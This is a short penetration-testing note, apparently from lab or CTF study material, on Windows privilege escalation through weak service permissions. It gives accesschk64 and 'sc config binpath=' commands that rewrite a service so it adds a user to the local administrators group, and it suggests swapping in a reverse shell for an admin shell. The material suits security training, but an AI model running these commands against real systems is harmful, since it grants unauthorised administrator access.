Binary Paths

PowerUp shows this under service permissions

WinPEAS shows this under services information

Run: accesschk64.exe -uwcv Everyone * (Check where we have write access to Everyone group and the service name) To know more info about the service: accesschk64.exe -uwcv daclsvc If we have CHANGE_CONFIG, run: sc qc daclsvc sc config daclsvc binpath= “net localgroup administrators user /add” Run sc qc daclsvc to check if BINARY_PATH_NAME has been set Run net localgroups administrators You will only see the preexisiting users. Then run sc start daclsvc (You may get an error. Still run the next command to check) net localgroup administrators

You can even try adding a path of reverse shell to the binpath to spawn a admin shell